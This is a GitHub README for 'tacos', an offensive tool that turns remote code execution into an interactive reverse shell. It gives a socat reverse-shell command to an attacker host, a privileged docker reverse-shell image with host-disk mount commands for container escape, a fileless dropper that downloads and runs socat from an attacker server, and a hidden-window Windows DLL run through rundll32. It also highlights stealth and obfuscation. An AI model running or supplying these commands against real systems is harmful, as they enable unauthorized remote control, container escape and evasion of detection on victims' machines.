Skip to content
/ tacos Public

🌮 INTERACTIVE reverse shell everywhere! (Particularly digestible with socat multi-handler listener)

License

Notifications You must be signed in to change notification settings

ariary/tacos

Repository files navigation

tacos 🌮

(reverse socat)

Spawn a pty in your reverse shell to automaticaly make it interactive for socat listener.

Fast interactive reverse shell set-up 🐳 (container)

All credit goes to laluka idea

Equivalent of:

socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0

Why ?

  • transform RCE to interactive reverse shell with almost no prerequisite (only curl)
  • cross-platform (windows support is OK but not yet interactive. It is recommended to use non-docker solution for it)
  • tired of hitting ^C and loosing your shell?
  • too lazy to copy/paste/learn socat command
  • target doesn't have socat and you don't want to do this
  • provide more advanced configuration to the tty (alias, etc)
  • easier to obfuscate

Usage

« I quickly want an interactive reverse shell», take a wrap! 🥙

# On attacker machine
tmux
wrap --lhost [ATTACKER_IP] #launch socat listener + output command to run on target

# On target
# paste command outputted by wrap: it will download tacos, and launch it to obtain the interactive revshell

🎁 Bonus n°1: expose listener to the world wide web

Useful if target can't directly reach the attacker machine, but has internet access
On attacker machine, install ngrok or bore and launch your listener:
wrap -n

N.B: ngrok is more stable than bore for now

With docker (recommended)

Source aliases (for simplicity):

alias tacos.container='docker run --net host --rm -it ariary/tacos'

Launch multi-handler listener:

tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]

Notes about tacos container security:

From a networking point of view, this is the same level of isolation as if the processes were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.

🎁 Bonus n°2: tacos reverse shell image

Useful if target is running docker, kubernetes, etc ...
On attacker machine, launch your tacos listener as usual
On target:

docker run --privileged --rm -it ariary/tacos-reverse [TACOS_LISTENER_IP]:[TACOS_LISTENER_PORT]
💡: --privileged mode is not mandatory. It is used to allow container escaping with:

fdisk -l
mkdir /mnt/hostfs
mount /dev/sda1 /mnt/hostfs

💡: If you only have writing access to a manifest deploying containers. Use ariary/tacos-reverse image with appropriate arguments

Easy install

  • Requirements: go, git, tmux (and ngrok, bore)
  • Install all the stuff: ./install-all-in-one.sh

You're now good to go !:

tacos.listener

Alternatives

Alternatively, if target does not have socat: Host a static version of socat binary and download + execute it using the stealthy filess-xec dropper:

# On attacker machine
# get socat static & expose it
static-get socat
python3 -m http.server 8080

# On target machine
# Use already downloaded fileless-xec to download socat and stealthy launch it with argument
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:[SOCAT_LISTENING_PORT],verify=0

Use dll instead of .exe

# On attacker machine:
# modify ./cmd/tacosdll/tacosdll.go with the according IP:PORT
$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go

# On remote:
> rundll32.exe ./tacos.dll,Tacos